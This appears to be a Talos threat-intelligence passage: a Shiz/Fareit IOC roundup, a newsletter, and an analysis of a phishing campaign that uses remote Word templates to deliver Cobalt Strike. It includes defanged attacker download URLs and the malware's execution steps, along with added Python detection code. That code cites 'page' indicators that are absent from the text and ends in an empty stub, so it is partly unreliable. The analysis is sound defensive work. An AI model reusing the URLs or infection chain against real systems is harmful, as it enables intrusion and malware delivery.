8379ba1a2904b162411009fbe1bc4c94efd1ccf72ab38989dffb2077c1a0ec74 86e574bcb8a28b933731a83f9166c23c717a9840dfdecffde9130e9a2d598e08 8e39459d72319dc5e7f184b363ac8d7e3a486fbc6e02f9ad2273d0b0502a188d 8e5f994ccd02d59bc203efd3ff130575c4d9c170599592dd45696b87c4f4b420
*See JSON for more IOCs

Coverage

Product                     Protection
Secure Endpoint             This has coverage
Cloudlock                   N/A
CWS                         This has coverage
Email Security              This has coverage
Network Security            N/A
Stealthwatch                N/A
Stealthwatch Cloud          N/A
Secure Malware Analytics    This has coverage
Umbrella                    N/A
WSA                         N/A

Screenshots of Detection

Secure Endpoint

Secure Malware Analytics

MITRE ATT&CK

Win.Dropper.Shiz-9971537-0

Indicators of Compromise

  • IOCs collected from dynamic analysis of 27 samples
Registry Keys (occurrences)
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN (Value Name: internat.exe) 27
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS (Value Name: ProxyEnable) 27
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\ZONEMAP (Value Name: UNCAsIntranet) 27
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\ZONEMAP (Value Name: AutoDetect) 27
<HKLM>\SOFTWARE\MICROSOFT (Value Name: 67497551a) 27
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINDOWS (Value Name: load) 27
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINDOWS (Value Name: run) 27
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN (Value Name: userinit) 27
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINLOGON (Value Name: 98b68e3c) 27
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINLOGON (Value Name: userinit) 27
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINLOGON (Value Name: System) 27
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINDOWS (Value Name: run) 27
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN (Value Name: userinit) 27
<HKCR>\LOCAL SETTINGS\SOFTWARE\MICROSOFT\WINDOWS\SHELL\BAGS\159\SHELL (Value Name: KnownFolderDerivedFolderType) 1
Mutexes (occurrences)
Global\674972E3a 27
Global\MicrosoftSysenterGate7 27
internal_wutex_0x<random, matching [0-9a-f]{8}> 27
internal_wutex_0x000004b4 26
internal_wutex_0x0000043c 26
internal_wutex_0x000004dc 25
internal_wutex_0x000000e0 1
internal_wutex_0x0000038c 1
internal_wutex_0x00000448 1
internal_wutex_0x000006a0 1
IP Addresses contacted by malware (occurrences; contact does not by itself indicate maliciousness)
204[.]79[.]197[.]200 15
13[.]107[.]21[.]200 12
45[.]33[.]23[.]183 8
173[.]255[.]194[.]134 6
72[.]14[.]178[.]174 6
72[.]14[.]185[.]43 6
45[.]56[.]79[.]23 5
45[.]33[.]2[.]79 5
45[.]33[.]30[.]197 5
45[.]33[.]18[.]44 4
45[.]79[.]19[.]196 3
198[.]58[.]118[.]167 3
85[.]94[.]194[.]169 2
96[.]126[.]123[.]244 1
45[.]33[.]20[.]235 1
Domain Names contacted by malware (occurrences; contact does not by itself indicate maliciousness)
kevopoxecun[.]eu 27
rycaropynar[.]eu 27
lyxemoxyquf[.]eu 27
puzoxyvojyc[.]eu 27
fotaqizymig[.]eu 27
cidufitojex[.]eu 27
puvacigakog[.]eu 27
xuboninogyt[.]eu 27
cicezomaxyz[.]eu 27
dixyjohevon[.]eu 27
fokisohurif[.]eu 27
volugomymet[.]eu 27
maganomojer[.]eu 27
jefecajazif[.]eu 27
qedylaqecel[.]eu 27
nojotomipel[.]eu 27
gahoqohofib[.]eu 27
rytifaquwer[.]eu 27
kepujajynib[.]eu 27
lyrosajupid[.]eu 27
tuwaraqidek[.]eu 27
pumebeqalew[.]eu 27
cinycekecid[.]eu 27
divulewybek[.]eu 27
vocijekyqiv[.]eu 27
*See JSON for more IOCs
Files and/or directories created (occurrences)
%TEMP%\<random, matching [A-F0-9]{1,4}>.tmp 27
%TEMP%\F1A0.tmp 1
%TEMP%\8350.tmp 1
%TEMP%\6709.tmp 1
%TEMP%\5ABC.tmp 1
%TEMP%\DF95.tmp 1

File Hashes

03ceb23a35bcd7170f8e2293c15aa444406959d789fda9ff9e412cf7a3a6ad90 0a00f10084231e3abf745b456d522c27a284cd17e5824a91026e6511a0073792 0a9d1eec9b14e840863b4948703b4c1a50b8d1c16d6cd6c0191ed55e82864ea3 0aa380118e812371de65b56f760676f611ddda8a7dd422ed1e62214c2a8303d1 0b38f48ffc49f1b53724384bd894702bcf49f2d68c1b84e4e0eeb931d572d294 0b8cfcf3c71b18b73ec50c68115b5d7538eab4d21168272d547e4b6316ed592a 0d8afb797e2ce9f712f3b5fb22317ec97cd8ea55b85855ffb33f362f45e3b706 10d952070cca8a50175e4193e23e798484f215faa6ac8261b37caebb4ae4c22a 16487b9aabc544819f3e1843e196d8e6b982b15ae95b9b599af310c0f4a0763e 1751820a0b3e9669c512077ef08caa8cc8bd7cba8bb54eb97c574ba6dfa09d2d 1bafc4ef3a634e29c71f52e5b0f3ea6ab3cd55e25ef9623d8d21302a13ac4833 21c50af5ea57cf75b6bcf6e74b8008b335a440d4f4fd8499d2abc287116a0100 2473d34831b6fef2e985c045c3a00880d05aceeeac10edf1f09ff38a1cbc44af 2602a1096a4eec7291145b4570c1a0e814c03fba18d3d76d1b82f6e0dacaecf8 2656072242b6777473e258b7f0fc7777cda688fe95f0050f375ffeb12f000c28 2856afa65f2c7f0a23be68ce6899f24a9d3e12fa4f3b00644562e1ecdc06eed1 28b92d2ad7b6c9865a5eda3ca5435cbcd7b24fd0b48ed61c9c7b87af542b88ed 29bc8c64d83b59592ced9e79fd8e242344fedaa9bff3d385ce5372de7e035b4b 2a812fc2558cfe90756a59a8d79ec8da9e14d7fec59cd9bbc5189a67a86629eb 2e7fe1b9448cb0cca242f4b72fd956f21ad262587b88135045bc07a010cec102 3047c7b03f084dc15ddbca4044a0fb2376af8b3799e4316194de8ef1474e1bf8 321f58c68fead768a8465532821b62ec741482135b0a5460d48838433cde6133 32b2f95694db2d96de89e4f8644cbdf68229903053c066499141b323d4acca1a 34beb6169472ea58264460d2673a70128474e9bdb62fe998e5c22f9a4fa61a8c 350596b9f1a539dddfd73cb4d10c605ec8cc8ed227bd2f33f31fddd6f190e7d8
*See JSON for more IOCs

Coverage

Product                     Protection
Secure Endpoint             This has coverage
Cloudlock                   N/A
CWS                         This has coverage
Email Security              This has coverage
Network Security            This has coverage
Stealthwatch                N/A
Stealthwatch Cloud          N/A
Secure Malware Analytics    This has coverage
Umbrella                    This has coverage
WSA                         This has coverage

Screenshots of Detection

Secure Endpoint

Secure Malware Analytics

MITRE ATT&CK

Win.Packed.Fareit-9971247-1

Indicators of Compromise

  • IOCs collected from dynamic analysis of 13 samples
Registry Keys (occurrences)
<HKCU>\SOFTWARE\WINRAR 13
<HKCU>\SOFTWARE\WINRAR (Value Name: HWID) 13
IP Addresses contacted by malware (occurrences; contact does not by itself indicate maliciousness)
168[.]144[.]38[.]105 13

File Hashes

1acb437594832fbf922ea62142314c31026f4345dfd31cf843acb52eca1aec92 1cc621b3d1a8db17783e813726cee6309e7802110a6d93779b7096e723023628 39b43b15aeb0a1aff4ca35928a2dd25aa6439c2faa24721424a749cd5b376153 57e6addd9c1c9f9367c48020e1f004a26cd6b361c6145ec97e554fd991ca5925 6bc8e9d23757833faff22d586d92d2274283e5bbe400bf07fdd2c5a070f39bd2 84238de8af6828ea6864308ce0ea0f0e798c31c2e105c3b7bf0f238732738d78 8f1566be038140548e9c1350a9ae28d95c1b70b8f79c0ba3ba094ffec8b530c2 914e1a2a9ca34ba6b66795165ea9e57d2817f3aa23ed662a565c9ad6c6476459 a9b1fb4abbebe49a65998d688a02819d8bdc3eeeebad496b94b5f6b27ff4e49b b7f64dd2cb3cb310bfbbd54e29b4f9c03e94bd474ab487e403aec3357350307a c6c1fcd270017f81a8113545eb42471f98700eb162ccbd4272b54de6435c4971 f4fd5a689233ea0c7c0d1599f14b68554f5c07f0c12c86981e0eef4be06940be fb2a62eecd3f1a04e0633f43d472229ef3994de0a212da08d21c9fea8577016e

Coverage

Product                     Protection
Secure Endpoint             This has coverage
Cloudlock                   N/A
CWS                         This has coverage
Email Security              This has coverage
Network Security            N/A
Stealthwatch                N/A
Stealthwatch Cloud          N/A
Secure Malware Analytics    This has coverage
Umbrella                    N/A
WSA                         N/A

Screenshots of Detection

Secure Endpoint

Secure Malware Analytics

MITRE ATT&CK
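The roundup entries above share one layout: two-column tables flattened to text, addresses defanged with [.], sandbox-randomized names written as <random, matching '...'> placeholders, and SHA-256 lists on a single line. The Python below is an added example, not code from Talos or from this page. It parses an excerpt constructed in that layout from rows on this page into structured indicators, compiles the placeholders and %ENV% tokens into regular expressions, and matches them against a constructed set of endpoint observations. The observed paths, the function names and the Indicator type are the example's own assumptions.

```python
"""Parse Threat Roundup-style IOC text into indicators and match them against
artifacts observed on an endpoint. Added example; not code from Talos or this page."""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class Indicator:
    kind: str         # "registry", "mutex", "ip", "domain" or "file"
    value: str        # refanged text as printed, placeholders left in place
    occurrences: int  # number of analyzed samples that produced it


# Fused table headers as they appear in the text, by prefix -> indicator kind.
HEADER_KINDS = {
    "Registry Keys": "registry",
    "Mutexes": "mutex",
    "IP Addresses": "ip",
    "Domain Names": "domain",
    "Files and": "file",
}
HEADER_RX = re.compile(r"\(?occurrences\)?$", re.IGNORECASE)
# Talos placeholder for a sandbox-randomized name, or a Windows %ENV% token.
TOKEN_RX = re.compile(r"<random, matching '?(.+?)'?>|%[A-Za-z0-9]+%")
SHA256_RX = re.compile(r"\b[0-9a-f]{64}\b")

# Constructed excerpt in the roundup's own layout: rows copied from this page,
# including a registry entry that the text spreads over three lines.
ROUNDUP_TEXT = r"""
Registry Keys Occurrences
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\APPLICATIONDESTINATIONS
Value Name: MaxEntries
1
Mutexes Occurrences
Global\MicrosoftSysenterGate7 27
internal_wutex_0x<random, matching [0-9a-f]{8}> 27
IP Addresses contacted by malware. Does not indicate maliciousness Occurrences
47[.]111[.]103[.]192 13
Domain Names contacted by malware. Does not indicate maliciousness Occurrences
os[.]ieycc[.]com 13
Files and or directories created Occurrences
%TEMP%\<random, matching '[a-z]{3}[A-F0-9]{3,4}'>.tmp 42
%APPDATA%\winapp\client_id 3
*See JSON for more IOCs
File Hashes
015c6d06fe9aaa4844b5e008796cbb854cf6765c2ca398f596dd2fceeceb6c95 0de5af728d4834e450386979efd9681bd54bfeb65f687cccd621f3a20331c050
"""


def refang(value: str) -> str:
    """Undo the [.] defanging the roundup applies to IPs and domains."""
    return value.replace("[.]", ".")


def parse_roundup(text: str) -> list[Indicator]:
    """Walk the text section by section; a row ends at its trailing integer count."""
    indicators, kind, pending = [], None, []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("*See JSON"):
            continue
        if HEADER_RX.search(line):
            kind = next((k for p, k in HEADER_KINDS.items() if line.startswith(p)), None)
            pending = []
            continue
        if line in ("File Hashes", "Coverage"):  # sections without counted rows
            kind = None
            continue
        if kind is None:
            continue
        value, _, count = line.rpartition(" ")
        if line.isdigit():            # count alone on a line: closes a multi-line row
            value, count = " ".join(pending), line
        elif count.isdigit():         # "value count" on one line
            value = " ".join(pending + [value])
        else:                         # continuation line such as "Value Name: X"
            pending.append(line)
            continue
        pending = []
        indicators.append(Indicator(kind, refang(value), int(count)))
    return indicators


def extract_sha256(text: str) -> list[str]:
    """File hashes are printed space-separated on one line; pull every SHA-256."""
    return SHA256_RX.findall(text)


def to_regex(ind: Indicator) -> re.Pattern:
    """Escape the literal parts of a value, keep each placeholder's regex verbatim and
    turn %ENV% tokens into a lazy wildcard so fully expanded paths still match."""
    parts, pos = [], 0
    for m in TOKEN_RX.finditer(ind.value):
        parts.append(re.escape(ind.value[pos:m.start()]))
        parts.append(m.group(1) if m.group(1) is not None else r".*?")
        pos = m.end()
    parts.append(re.escape(ind.value[pos:]))
    # Mutex names are case-sensitive; Windows paths, registry keys and hostnames are not.
    flags = 0 if ind.kind == "mutex" else re.IGNORECASE
    return re.compile("".join(parts), flags)


def match_artifacts(indicators, observed):
    """observed: (kind, value) pairs from a sandbox or EDR. Returns (value, indicator) hits."""
    compiled = [(ind, to_regex(ind)) for ind in indicators]
    return [(value, ind) for kind, value in observed
            for ind, rx in compiled if ind.kind == kind and rx.fullmatch(value)]


# Constructed endpoint observations (assumed, not from the page) to exercise the matcher.
OBSERVED = [
    ("file", r"C:\Users\bob\AppData\Local\Temp\qzxD1F.tmp"),   # fits the random .tmp row
    ("file", r"C:\Users\bob\AppData\Local\Temp\report.tmp"),   # does not
    ("mutex", "internal_wutex_0x000004b4"),
    ("domain", "os.ieycc.com"),
    ("ip", "47.111.103.193"),                                   # neighbour, not listed
]

if __name__ == "__main__":
    for value, ind in match_artifacts(parse_roundup(ROUNDUP_TEXT), OBSERVED):
        print(f"{ind.kind:8} {value}  <- {ind.value} ({ind.occurrences} samples)")
    print(len(extract_sha256(ROUNDUP_TEXT)), "hashes")
```

Run directly, it prints the three hits (the random .tmp file, the Shiz-style mutex and the Zusy domain) and the hash count. An IP or domain hit carries the caveat the tables state: contact does not by itself indicate maliciousness. For production use the %ENV% wildcard should be narrowed to the real expansion on the host, since `.*?` also accepts paths outside the user's profile.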






Threat Source newsletter (Sept. 29, 2022) — Personal health apps are currently under a spotlight, but their warning signs have always been there

29 September 2022 at 18:00


By Jon Munshaw. 

Welcome to this week’s edition of the Threat Source newsletter. 

I’ve spent the past few months with my colleague Ashlee Benge looking at personal health apps’ privacy policies. We found several instances of apps that carry sensitive information stating they would share certain information with third-party advertisers and even law enforcement agencies, if necessary. 

One of the most popular period-tracking apps on the Google Play store, Period Calendar Period Tracker, has a privacy policy that states it will "share information with law enforcement agencies, public authorities, or other organizations if We’re [sic] required by law to do so or if such use is reasonably necessary. We will carefully review all such requests to ensure that they have a legitimate basis and are limited to data that law enforcement is authorized to access for specific investigative purposes only." 

A report from the Washington Post also released last week found that this app, as well as popular health sites like WebMD, “gave advertisers the information they’d need to market to people, or groups of consumers based on their health concerns.” 

To me, these were all things I had never considered before. I'm sure I'm not alone in just going to Google to type in "pain in left flank" or something along those lines to see if I'm dying or not. The research Ashlee and I did really made me rethink the type of information I'm inputting into apps on my phone, especially around my health. For example, I de-coupled the Google Fit tracking from my phone so it's not just counting steps in the background. And I've switched to a privacy-focused browser on my personal computer at home (it doesn't help that I'm also mad at Chrome for ending support for ad blockers).

I’m actually mad at myself that it took me this long to think more critically about this topic. The research has always been out there. 

A 2018 study from Privacy International found that 61 percent of apps they tested immediately started sharing data with Facebook the instant a user opens the app — this was at the peak of the discussion around the Cambridge Analytica/Facebook scandal. And the U.S. Federal Trade Commission filed a complaint against the Flo period-tracking app in January 2021 for misleading users about who it sends personal information to.

We, collectively as a society, should have always been taking this issue more seriously. And the recent Supreme Court ruling in Dobbs v. Jackson Women's Health Organization is highlighting how personal data stored on apps could lead to legal consequences. The warning signs have always been there, but I think we were just too willing to trade in convenience in exchange for our privacy, thinking many of us have “nothing to hide.”


The one big thing 


Insider threats are becoming an increasingly common part of the attack chain, with malicious insiders and unwitting assets playing key roles in incidents over the past year. This is becoming an increasing challenge for companies that now have remote workers all over the globe, many of whom may never come back to the office again. And if one of these employees leaves, it could leave some major security gaps. Over the past six months to a year, Talos has seen an increasing number of incident response engagements involving malicious insiders and unwitting assets being compromised via social engineering. 

Why do I care? 

Insider threats are different from the “traditional” cyber attacks we think of because it’s not about a threat actor sitting in an entirely different country lobbing malicious code at a network. It usually involves socially engineering someone into unwittingly letting their guard down and providing access to a malicious user, or giving up sensitive information in exchange for some money. This can seriously happen to anyone anywhere, increasingly so in the era of hybrid work.

So now what?

Defending against these types of insider threats is difficult for a variety of reasons, but first and foremost because insiders are typically allowed to access the network and hold valid login credentials. This is where traditional security controls like identity and access management come into play: organizations should limit each user's access to the minimum required for them to perform their job.

 

Top security headlines from the week


Ukraine is warning that Russian state-sponsored actors are still targeting critical infrastructure with cyber attacks. The campaigns are likely intended to “increase the effect of missile strikes on electrical supply facilities,” the Ukrainian government said. The warning also stated that the actors would target Baltic states and Ukrainian allies with distributed denial-of-service attacks. Meanwhile, the U.S. continues to invest money in Ukraine’s cyber defenses and volunteer hackers continue to pitch in across the globe. (CyberScoop, Voice of America)

U.K. police arrested a teenager allegedly involved in the recent Rockstar data breach, which included leaked information about the upcoming “Grand Theft Auto VI” video game. The suspect may have ties to the Lapsus$ extortion group and some involvement in another data breach against the Uber rideshare company. Lapsus$’s recent activities differ vastly from the traditional goals of most threat actors, which usually involve making money somehow; the group instead seems to want to cause chaos for the sake of it. These two major breaches highlight the fact that many major organizations have unaddressed weaknesses. (TechCrunch, Wired)

A disgruntled developer leaked the encryptor builder behind the LockBit 3.0 ransomware, the latest in a line of drama with the group. The builder works and could allow anyone to build their own ransomware. The Bl00Dy ransomware gang has already started to use the leaked builder in attacks against companies. Bl00Dy has been operating since May 2022, first targeting medical and dental offices in New York. In the past, the group has also used leaked code from Babuk and Conti to build their ransomware payloads. They also claim to have a Tor channel they use to post leaks from affected companies if they do not pay the ransom. (The Record, Bleeping Computer)


Can’t get enough Talos? 

Upcoming events where you can find Talos 


Virtual 

GovWare 2022 (Oct. 18 - 20)
Sands Expo & Convention Centre, Singapore 

Most prevalent malware files from Talos telemetry over the past week  


SHA 256: e4973db44081591e9bff5117946defbef6041397e56164f485cf8ec57b1d8934  
MD5: 93fefc3e88ffb78abb36365fa5cf857c  
Typical Filename: Wextract  
Claimed Product: Internet Explorer  
Detection Name: PUA.Win.Trojan.Generic::85.lp.ret.sbx.tg  

MD5: 2c8ea737a232fd03ab80db672d50a17a     
Typical Filename: LwssPlayer.scr     
Claimed Product: 梦想之巅幻灯播放器     
Detection Name: Auto.125E12.241442.in02 

MD5: 10f1561457242973e0fed724eec92f8c   
Typical Filename: ntuser.vbe   
Claimed Product: N/A    
Detection Name: Auto.1A234656F8.211848.in07.Talos 

MD5: 8a5f8ed00adbdfb1ab8a2bb8016aafc1   
Typical Filename: RunFallGuys.exe 
Claimed Product: N/A 
Detection Name: W32.Auto:c326d1.in03.Talos 

MD5: 147c7241371d840787f388e202f4fdc1 
Typical Filename: EKSPLORASI.EXE 
Claimed Product: N/A  
Detection Name: Win32.Generic.497796 

New campaign uses government, union-themed lures to deliver Cobalt Strike beacons

28 September 2022 at 12:12
By Chetan Raghuprasad and Vanja Svajcer.
  • Cisco Talos discovered a malicious campaign in August 2022 delivering Cobalt Strike beacons that could be used in later, follow-on attacks.
  • Lure themes in the phishing documents in this campaign are related to the job details of a government organization in the United States and a trade union in New Zealand.
  • The attack involves a multistage and modular infection chain with fileless, malicious scripts.

Cisco Talos recently discovered a malicious campaign with a modularised attack technique to deliver Cobalt Strike beacons on infected endpoints.

The initial vector of this attack is a phishing email with a malicious Microsoft Word document attachment containing an exploit for CVE-2017-0199, a remote code execution vulnerability in Microsoft Office. If a victim opens the maldoc, it downloads a malicious Word document template hosted on an attacker-controlled Bitbucket repository.

Talos discovered two attack methodologies employed by the attacker in this campaign. In the first, the downloaded DOTM template executes an embedded malicious Visual Basic script, which generates and executes further obfuscated VB and PowerShell scripts. In the second, the malicious VB script downloads and runs a Windows executable, which in turn executes malicious PowerShell commands to download and implant the payload.

The payload discovered is a leaked version of a Cobalt Strike beacon. The beacon configuration contains commands to perform targeted process injection of arbitrary binaries, and a high-reputation domain is configured as the HTTP Host header: a redirector technique that disguises the beacon's traffic as legitimate.

Although the payload discovered in this campaign is a Cobalt Strike beacon, Talos also observed usage of the Redline information-stealer and Amadey botnet executables as payloads.

This campaign is a typical example of a threat actor using the technique of generating and executing malicious scripts in the victim's system memory. Defenders should implement behavioral protection capabilities in the organization's defense to effectively protect them against fileless threats.

Organizations should remain vigilant for Cobalt Strike beacons and implement layered defense capabilities to thwart the attacker's attempts at the earliest stage of the infection chain.

Initial vector

The initial infection email is themed to entice the recipient to review the attached Word document and provide some of their personal information.

Initial malicious email message.

The maldocs have lures containing text related to the collection of personally identifiable information (PII) which is used to determine the eligibility of the job applicant for employment with U.S. federal government contractors and their alleged enrollment status in the government's life insurance program.

The text in the maldoc resembles the contents of a declaration form of the U.S. Office of Personnel Management (OPM) which serves as the chief human resources agency and personnel policy manager for the U.S. federal government.

Contents of maldoc sample 1.

Another maldoc from the same campaign contains a job description advertising roles related to delegate development, PSA Plus and administrative support for National Secretaries at the Public Service Association (PSA) office in Wellington, New Zealand. The PSA is a prominent New Zealand trade union for public service workers, headquartered in Wellington, and the contents of this lure resemble its legitimate job description documents.

Contents of maldoc sample 2.

PSA New Zealand released this legitimate job description document in April 2022. The threat actor constructed the maldoc to contain the text lures to make it appear as a legitimate document on May 6, 2022. Talos' observation shows that the threat actors are also regular consumers of online news.

Attack methodologies

Attack methodologies employed by the actor in this campaign are highly modularised and have multiple stages in the infection chain.

Talos discovered two different attack methodologies in this campaign with a few variations in TTPs, while the initial infection vector, the use of remote template injection and the final payload remained the same.

Method 1

This is a modularised method with multiple stages in the infection chain to implant a Cobalt Strike beacon, as outlined below:

Summary of attack method 1 infection chain.

Stage 1 maldoc: DOTM template

The malicious Word document contains an embedded URL, https[://]bitbucket[.]org/atlasover/atlassiancore/downloads/EmmaJardi.dotm, within its relationship component "word/_rels/settings.xml.rels". When a victim opens the document, the malicious DOTM file is downloaded.

Contents of settings.xml.rels of maldoc.
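One check an analyst can run on a suspect document is to open it as a ZIP archive and look for relationship parts whose targets point outside the package: an attachedTemplate relationship with TargetMode="External" in word/_rels/settings.xml.rels is exactly the remote template injection primitive this maldoc uses. The Python below is an added example, not code from Talos or from the campaign. It assumes nothing beyond the standard library: it builds a minimal constructed .docx in memory (the real samples are not reproduced) carrying the template URL reported above in its defanged form, plus a benign document for comparison, and scans every .rels part of each for external targets.

```python
"""Scan an Office Open XML document for relationships that point outside the
package. An attachedTemplate relationship with TargetMode="External" is the
remote template injection primitive used by the maldocs described above.
Added example; the documents built below are constructed, not real samples."""
import io
import zipfile
import xml.etree.ElementTree as ET

REL_NS = "{http://schemas.openxmlformats.org/package/2006/relationships}"
ATTACHED_TEMPLATE = ("http://schemas.openxmlformats.org/officeDocument/2006/"
                     "relationships/attachedTemplate")
W_NS = "http://schemas.openxmlformats.org/wordprocessingml/2006/main"

# Template URL reported for this campaign, kept defanged as on the page.
SAMPLE_TEMPLATE_URL = ("https[://]bitbucket[.]org/atlasover/atlassiancore/"
                       "downloads/EmmaJardi.dotm")


def find_external_relationships(docx_bytes):
    """Return one dict per external relationship found in any .rels part.
    'remote_template' is True when the type is attachedTemplate, i.e. Word
    will fetch the template (and its macros) from the target when opened."""
    hits = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as z:
        for name in z.namelist():
            if not name.lower().endswith(".rels"):
                continue
            try:
                root = ET.fromstring(z.read(name))
            except ET.ParseError:
                continue  # malformed part; a separate concern
            for rel in root.iter(REL_NS + "Relationship"):
                if rel.get("TargetMode", "Internal") != "External":
                    continue
                rel_type = rel.get("Type", "")
                hits.append({
                    "part": name,
                    "id": rel.get("Id"),
                    "type": rel_type.rsplit("/", 1)[-1],
                    "target": rel.get("Target"),
                    "remote_template": rel_type == ATTACHED_TEMPLATE,
                })
    return hits


def _minimal_docx(settings_rels):
    """Build a skeletal .docx with only the parts this check needs."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("[Content_Types].xml", '<?xml version="1.0" encoding="UTF-8"?>'
                   '<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types"/>')
        z.writestr("word/document.xml", '<?xml version="1.0" encoding="UTF-8"?>'
                   f'<w:document xmlns:w="{W_NS}"><w:body/></w:document>')
        z.writestr("word/settings.xml", '<?xml version="1.0" encoding="UTF-8"?>'
                   f'<w:settings xmlns:w="{W_NS}"/>')
        z.writestr("word/_rels/settings.xml.rels", settings_rels)
    return buf.getvalue()


def build_sample_maldoc(template_url=SAMPLE_TEMPLATE_URL):
    """Constructed document whose settings.xml.rels mirrors the maldoc layout above."""
    rels = ('<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
            f'<Relationships xmlns="{REL_NS[1:-1]}">'
            f'<Relationship Id="rId1" Type="{ATTACHED_TEMPLATE}" '
            f'Target="{template_url}" TargetMode="External"/>'
            '</Relationships>')
    return _minimal_docx(rels)


def build_benign_doc():
    """Constructed document with only an internal relationship, for comparison."""
    rels = ('<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
            f'<Relationships xmlns="{REL_NS[1:-1]}">'
            '<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/'
            'officeDocument/2006/relationships/styles" Target="styles.xml"/>'
            '</Relationships>')
    return _minimal_docx(rels)


if __name__ == "__main__":
    for label, doc in (("sample maldoc", build_sample_maldoc()),
                       ("benign doc", build_benign_doc())):
        hits = find_external_relationships(doc)
        print(label, "->", hits if hits else "no external relationships")
```

Any hit with remote_template set is worth treating as hostile regardless of where the target points, since a template fetched at open time can be swapped by the attacker after the document has passed mail filtering.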

Stage 2: VBA dropper

The downloaded DOTM executes its malicious Visual Basic for Applications (VBA) macro. The VBA dropper code contains an encoded data blob which is decoded and written to an HTA file, "example.hta," in the user profile's local application data temporary folder. The decoded content is the next-stage VB script, which is launched with the ShellExecute method.

Stage 2 VBA dropper.

Stage 3 VB script

The third-stage VBS structure is similar to that of the stage 2 VB dropper. An array of the encoded data will be decoded to a PowerShell script, which is generated in the victim's system memory and executed.

Stage 3 VB script.

Stage 4 PowerShell script

The PowerShell dropper script executed in the victim's system memory contains an AES-encrypted data blob as a base64-encoded string and a second base64-encoded string holding the decryption key. Both strings are base64-decoded to recover the encrypted data block and the 256-bit AES key. Decrypting the block with that key yields a PowerShell downloader script, which is executed with Invoke-Expression (IEX).

Stage 4 PowerShell script.

Stage 5 PowerShell downloader

The PowerShell downloader script is obfuscated and contains encoded blocks that are decoded to generate the download URL, file execution path and file extensions.

The following actions are performed by the script upon its execution in victim's system memory:

  1. The script downloads the payload from the actor-controlled remote location "https[://]bitbucket[.]org/atlasover/atlassiancore/downloads/newmodeler.dll" to the user profile's local application data temporary folder.
  2. The script checks the file extension of the downloaded payload.
  3. If the payload has a .dll extension, the script runs it with rundll32.exe (proxy execution through a signed Windows binary).
  4. If the payload has an .msi extension, it is installed silently with the command "msiexec /quiet /i <payload>".
  5. If the payload is an .exe, the script runs it as a process with the PowerShell cmdlet Start-Process.
  6. After running the payload, the script sets the "hidden" file system attribute on the payload file so that it does not show up in ordinary directory listings.

During our analysis, we discovered that the downloaded payload is a Cobalt Strike DLL beacon.

Stage 5 PowerShell downloader.

Method 2

The second attack method of this campaign is also modular, but uses less sophisticated Visual Basic and PowerShell scripts. In this chain the actor employs a 64-bit Windows executable downloader that runs the PowerShell commands responsible for downloading and executing the Cobalt Strike payload.

Summary of attack method 2 infection chain.

Stage 1 maldoc: DOTM template

When a victim opens the malicious document, Word attempts to download a malicious remote DOTM template from the URL "https[://]bitbucket[.]org/clouchfair/oneproject/downloads/ww.dotm," which is embedded in the document's relationship part settings.xml.rels.

Contents of settings.xml.rels of maldoc.

Stage 2 VB script

The DOTM template contains a VBA macro that executes a function to decode an encoded data block of the macro to generate the PowerShell downloader script and execute it with the shell function.

Stage 2 VB script.

Stage 3 PowerShell downloader

The PowerShell downloader command downloads a 64-bit Windows executable and runs it as a process in the victim's machine.

Stage 3 PowerShell downloader.

Stage 4 downloader executable

The downloader is a 64-bit executable that runs as a process in the victim's environment. It executes a PowerShell command that downloads the Cobalt Strike payload DLL from the URL "https[://]bitbucket[.]org/clouchfair/oneproject/downloads/strymon.png" to the user profile's local application data temporary directory, keeping the spoofed .png extension, and then loads the DLL with rundll32.exe.

Stage 4 downloader EXE.

The downloader also runs the ping command against the IP address 1[.]1[.]1[.]1 and then a delete command to remove itself. The ping is used to introduce a delay before the downloader is deleted.
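The execution steps in both methods leave distinctive process-creation events: mshta launching an .hta from the user's local temp folder (method 1, stage 2), rundll32 or msiexec launching a payload from that folder (stage 5), rundll32 loading a module whose extension is not .dll (the strymon.png trick in method 2), and a ping-then-delete self-removal chain. The Python below is an added example, not a Talos detection, of hunting for those patterns over Sysmon Event ID 1 style records (image path plus command line). The events are constructed: the payload file names are those reported above, while the export name "EntryPoint", the file names payload.msi and loader.exe, and the exact shape of the ping/del command line are placeholders, since the page does not show them.

```python
"""Hunt over process-creation events (image path plus command line) for the
execution patterns described in both attack methods above. Added example;
the events below are constructed and the placeholder names are assumptions."""
import re

# Per-user local temp folder, regardless of user name or case.
LOCAL_TEMP = re.compile(r"\\AppData\\Local\\Temp\\", re.IGNORECASE)
# First argument to rundll32: optional quotes, ends at a quote or the ",Export" separator.
RUNDLL_MODULE = re.compile(r'rundll32(?:\.exe)?"?\s+"?([^",]+)', re.IGNORECASE)
PING_THEN_DEL = re.compile(r"\bping\b[^&]*&\s*del\b", re.IGNORECASE)
MSI_QUIET = re.compile(r"(^|\s)/quiet(\s|$)", re.IGNORECASE)
MSI_INSTALL = re.compile(r"(^|\s)/i\s+", re.IGNORECASE)


def classify_process_event(image, command_line):
    """Return the list of detection names triggered by one process-creation event."""
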